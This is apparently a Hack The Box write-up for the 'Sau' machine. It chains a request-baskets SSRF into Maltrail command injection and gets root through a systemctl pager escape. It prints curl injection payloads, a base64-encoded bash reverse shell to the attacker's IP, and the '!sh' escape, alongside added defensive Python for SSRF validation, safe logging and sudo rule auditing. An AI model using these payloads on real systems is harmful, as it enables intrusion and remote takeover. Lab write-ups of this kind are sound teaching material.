This is how I pwned Sau.
Initial Foothold
IP Address
10.129.248.192 - HTB Machine
10.10.16.9 - Attacker Machine
Open Ports
22
80
8338
55555
Nmap Scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
| 256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_ 256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 10 Jul 2023 07:33:08 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Mon, 10 Jul 2023 07:32:27 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Mon, 10 Jul 2023 07:32:30 GMT
|_ Content-Length: 0
Ports 80 and 8338 cannot be accessed through the browser (nmap reports them as filtered).
Next, open /web on port 55555 and check whether this version of request-baskets is vulnerable:
http://10.129.248.192:55555/web
Powered by request-baskets | Version: 1.2.1
https://github.com/darklynx/request-baskets
Road to User
CVE-2023-27163 - SSRF
https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3
[Affected Component]
The API endpoints /api/baskets/{name} and /baskets/{name} are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the forward_url parameter.
[Attack Vectors]
POC:
POST /api/baskets/{name} API with payload - {"forward_url": "http://127.0.0.1:80/test","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}
Details can be seen: https://notes.sjtu.edu.cn/s/MUUhEymt7
SSRF Vector
POST /api/baskets/{name}
[...]
{
"forward_url": "http://10.10.16.9:9001/",
"proxy_response": false,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
Following CVE-2023-27163 by itself only delivers the forwarded request to a netcat listener; it cannot execute shell commands.
Further enumeration
It is important to remember which attacks SSRF enables; port scanning of the internal network is one of them.
Ports 80 and 8338 could not be reached earlier, so try them as the forward_url in the attack vector.
POST /api/baskets/rei3 HTTP/1.1
Host: 10.129.248.192:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: 2wGpGuQz4Uy4gqgz7xGv7Ib6PokvYkKkF9GA9exP-k71
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.129.248.192
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
{
"forward_url": "http://127.0.0.1:8338", # Localhost
"proxy_response": true, # Must be true
"insecure_tls": true,
"expand_path": true,
"capacity": 250
}
Note that proxy_response must be true to view the response when the basket is accessed.
After forwarding the response of http://localhost:8338 to the basket at http://10.129.248.192:55555/rei3, it can be viewed by opening that URL.
Checking again whether this version is vulnerable.
http://10.129.248.192:55555/rei3
Maltrail (v0.53)
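The defender's side of the two findings above (the forward_url SSRF and its use to reach localhost:8338): the following is an added example, not code from request-baskets or from this writeup, showing how a request-forwarding feature can validate the destination before accepting it. The DNS table and hostnames are constructed so the check runs offline; a real deployment would use the live resolver.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain HTTP(S) forwarding makes sense; file:, gopher:, ftp: etc. are refused.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS answers so the demo runs offline. "evil.example" mixes a
# public and a loopback answer, the shape used to sneak past naive checks.
CONSTRUCTED_DNS = {
    "example.com": ["8.8.8.8"],
    "localhost": ["127.0.0.1"],
    "evil.example": ["8.8.8.8", "127.0.0.1"],
}


def constructed_resolver(host):
    try:
        return CONSTRUCTED_DNS[host]
    except KeyError:
        raise socket.gaierror(f"constructed resolver has no answer for {host}")


def live_resolver(host):
    """Real resolution returning every A/AAAA answer (pass explicitly to use it)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def address_is_internal(addr):
    """Loopback, RFC 1918, link-local, multicast, reserved or unspecified: never forward there."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_forward_url(url, resolver=constructed_resolver):
    """True only when the URL is http(s) to a host whose every address is public."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # user:pass@host is a classic parser-confusion vector
    host = parts.hostname  # brackets around IPv6 literals are already stripped
    try:
        ipaddress.ip_address(host)
        addresses = [host]
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:  # socket.gaierror is an OSError: unresolvable means refuse
            return False
    # One internal answer among the resolved set is enough to refuse.
    return bool(addresses) and not any(address_is_internal(a) for a in addresses)


SAMPLE_FORWARD_URLS = [
    "http://127.0.0.1:8338",     # the loopback pivot used against this box
    "http://10.10.16.9:9001/",   # RFC 1918 destination: refused as well
    "http://[::1]:8338/",
    "http://localhost:8338/",
    "http://evil.example/",      # mixed public/loopback answers
    "file:///etc/passwd",
    "http://unknown.invalid/",   # resolution failure
    "https://example.com/hook",  # public host: accepted
]


def check_examples():
    return {u: is_safe_forward_url(u) for u in SAMPLE_FORWARD_URLS}


if __name__ == "__main__":
    for url, ok in check_examples().items():
        print(f"{'ACCEPT' if ok else 'REFUSE'}  {url}")
```

Validating a hostname and then letting the HTTP client resolve it again leaves a DNS-rebinding window; connect to the address that passed the check (or pin it through a custom resolver) and re-run the check on every redirect.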
Finding user creds
Unauthenticated OS Command Injection in stamparm/maltrail: https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
Proof of Concept
curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'
It’s time to use the exploit.
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`id`'
> Using `id` returns Login Failed
Checking whether the command actually executes:
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`nc 10.10.16.9 80`'
> It connects to my netcat listener.
Crafting a reverse shell was tricky; after many tries I realized the payload needs to be base64-encoded.
/bin/bash -i >& /dev/tcp/10.10.16.9/9001 0>&1
# Encode the rev shell to Base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx
# Payload to be inserted in the username
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash
> It needs to be decoded on the target, inside the injected command.
# Executing the exploit
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash`'
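The root cause on the Maltrail side, shown here as an added example that is not Maltrail's own code and not part of this writeup: the username from the login form ends up inside a shell command line for logger (the process list later in this writeup shows exactly that `/bin/sh -c logger ...` line). The block contrasts that anti-pattern with the hardened argv form, proves offline that a no-shell exec delivers the metacharacters as inert text, and adds a small detection helper. The sample username, address and port are constructed.

```python
import json
import os
import shlex
import subprocess
import sys

# Constructed sample values, shaped like the page's payload (not a real login attempt).
INJECTED_USERNAME = ";`id > /tmp/bbq`"
CLIENT_ADDR = "127.0.0.1"
CLIENT_PORT = 40982
SHELL_METACHARACTERS = set(";|&`$<>(){}\n")


def vulnerable_shell_string(username, addr, port):
    """The anti-pattern: one string handed to /bin/sh -c, so ';' and backticks in
    the username are parsed by the shell. Built here for comparison, never executed."""
    return ('logger -p auth.info -t "maltrail[%d]" "Failed password for %s from %s port %d"'
            % (os.getpid(), username, addr, port))


def logger_argv(username, addr, port):
    """Hardened form: an argv list run without a shell; the whole message,
    metacharacters included, is a single argument to logger."""
    message = f"Failed password for {username} from {addr} port {port}"
    return ["logger", "-p", "auth.info", "-t", f"maltrail[{os.getpid()}]", message]


def shell_quoted_command(username, addr, port):
    """If a shell truly cannot be avoided, quote every argument instead of
    interpolating raw input; shlex.join yields a string sh parses back to the list."""
    return shlex.join(logger_argv(username, addr, port))


def quoting_round_trips(username, addr, port):
    """True when sh-style parsing of the quoted command gives back the original argv."""
    return shlex.split(shell_quoted_command(username, addr, port)) == logger_argv(username, addr, port)


def argv_as_seen_by_child(argv):
    """Run argv[1:] through a Python child that echoes its arguments as JSON.
    The child stands in for logger so the no-shell exec can be verified offline."""
    echo = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]
    done = subprocess.run(echo + argv[1:], capture_output=True, text=True, check=True)
    return json.loads(done.stdout)


def suspicious_username(username):
    """Detection aid: a login name carrying shell metacharacters deserves an alert."""
    return any(ch in SHELL_METACHARACTERS for ch in username)


def demo():
    argv = logger_argv(INJECTED_USERNAME, CLIENT_ADDR, CLIENT_PORT)
    return {
        "shell_string": vulnerable_shell_string(INJECTED_USERNAME, CLIENT_ADDR, CLIENT_PORT),
        "argv": argv,
        "seen_by_child": argv_as_seen_by_child(argv),
        "quoted": shell_quoted_command(INJECTED_USERNAME, CLIENT_ADDR, CLIENT_PORT),
        "round_trips": quoting_round_trips(INJECTED_USERNAME, CLIENT_ADDR, CLIENT_PORT),
        "flagged": suspicious_username(INJECTED_USERNAME),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The auth log lines shown later in this writeup read "Failed password for ; from 127.0.0.1": the backtick section was consumed and executed by the shell before logger ever saw it. With the argv form the full string would have been recorded verbatim, which is what a detection rule on shell metacharacters in usernames needs.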
User.txt
Now we have access to user puma.
puma@sau:/opt/maltrail$ ls ~
user.txt
puma@sau:/opt/maltrail$ cat ~/user.txt
[REDACTED-FLAG]
Path to Power (Gaining Administrator Access)
Skipping further enumeration and checking what the user puma can run with sudo:
puma@sau:/opt/maltrail$ sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Puma can run the permitted command through sudo:
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2023-07-10 16:38:56 UTC; 1 day 10h ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 867 (python3)
Tasks: 8 (limit: 4662)
Memory: 20.6M
CGroup: /system.slice/trail.service
├─ 867 /usr/bin/python3 server.py
├─3969 /bin/sh -c logger -p auth.info -t "maltrail[867]" "Failed password for ;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash` from 127.0.0.1 port 40982"
├─3970 /bin/sh -c logger -p auth.info -t "maltrail[867]" "Failed password for ;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash` from 127.0.0.1 port 40982"
├─3973 bash
├─3974 /bin/bash -i
├─3990 sudo /usr/bin/systemctl status trail.service
└─3992 /usr/bin/systemctl status trail.service
Jul 12 03:12:38 sau maltrail[3874]: Failed password for ; from 127.0.0.1 port 41318
Jul 12 03:13:02 sau maltrail[3888]: Failed password for ; from 127.0.0.1 port 41982
Jul 12 03:13:13 sau maltrail[3902]: Failed password for ; from 127.0.0.1 port 56598
Jul 12 03:13:38 sau maltrail[3918]: Failed password for ; from 127.0.0.1 port 37932
Jul 12 03:13:56 sau maltrail[3933]: Failed password for ; from 127.0.0.1 port 44900
Jul 12 03:18:04 sau maltrail[3950]: Failed password for ; from 127.0.0.1 port 52552
Jul 12 03:18:15 sau maltrail[3964]: Failed password for ; from 127.0.0.1 port 50450
Jul 12 03:26:14 sau sudo[3988]: puma : TTY=unknown ; PWD=/opt/maltrail ; USER=root ; COMMAND=list
Jul 12 03:27:01 sau sudo[3990]: puma : TTY=unknown ; PWD=/opt/maltrail ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 12 03:27:01 sau sudo[3990]: pam_unix(sudo:session): session opened for user root by (uid=0)
At first I thought I needed to overwrite the server.py that is being executed by the service, but the user puma cannot write to the directory or the file, nor stop the service.
Getting a shell
Spawning a shell
script /dev/null -c bash
sudo /usr/bin/systemctl status trail.service
!sh
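Why this works, and how to catch such rules before they are abused: systemctl status pages its output through less whenever stdout is a terminal (hence the script /dev/null step to obtain one), sudo's env_reset discards any SYSTEMD_PAGER the user sets, and the pager runs as root, so its command prompt runs `!sh` as root. The following added audit script is not part of this writeup or of sudo; it parses `sudo -l` output and flags permitted commands that end in an interactive pager. The sample text is the output shown above, pasted as a string.

```python
import os
import re

# Constructed sample: the `sudo -l` output from this box, pasted as a string.
SUDO_L_OUTPUT = r"""Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
"""

# One rule as `sudo -l` prints it: (runas) TAG: TAG: command args
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>\S.*?)\s*$")

PAGER_BINARIES = {"less", "more", "most"}
# systemctl verbs that page through less when stdout is a terminal
SYSTEMCTL_PAGED_VERBS = {"status", "show", "cat", "list-units", "list-unit-files",
                         "list-timers", "list-sockets", "list-dependencies"}


def parse_rules(sudo_l_text):
    """Extract (runas, tags, command) from the command section of `sudo -l` output."""
    rules, in_commands = [], False
    for line in sudo_l_text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if in_commands:
            m = RULE_RE.match(line)
            if m:
                rules.append(m.groupdict())
    return rules


def pager_risk(command):
    """Return (reason, fix) when the permitted command can end in an interactive pager, else None."""
    argv = command.split()
    binary, args = os.path.basename(argv[0]), argv[1:]
    if binary in PAGER_BINARIES:
        return (f"{binary} is an interactive pager; its command prompt can spawn a shell",
                "do not grant a pager through sudo; grant a non-interactive command instead")
    if binary == "systemctl" and args and args[0] in SYSTEMCTL_PAGED_VERBS and "--no-pager" not in args:
        return (f"systemctl {args[0]} pages its output through less on a terminal",
                "append --no-pager to the permitted command (env_reset drops a user-set SYSTEMD_PAGER)")
    if binary == "journalctl" and "--no-pager" not in args:
        return ("journalctl pages its output through less on a terminal",
                "append --no-pager to the permitted command")
    return None


def audit(sudo_l_text):
    """Run every parsed rule through pager_risk and return the findings."""
    findings = []
    for rule in parse_rules(sudo_l_text):
        risk = pager_risk(rule["command"])
        if risk:
            findings.append({**rule, "reason": risk[0], "fix": risk[1]})
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L_OUTPUT):
        print(f"[{f['tags'].strip() or 'PASSWD'}] {f['command']}")
        print(f"  risk: {f['reason']}")
        print(f"  fix:  {f['fix']}")
```

Because sudoers matches arguments exactly, a rule written as `/usr/bin/systemctl status trail.service --no-pager` can only be invoked with that flag present, which is what closes this path; a root-owned wrapper script that calls systemctl with --no-pager is the other common fix.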
Root.txt
# cat /root/root.txt
[REDACTED-FLAG]
That’s how I pwned Sau.
Achievement:
https://www.hackthebox.com/achievement/machine/743510/551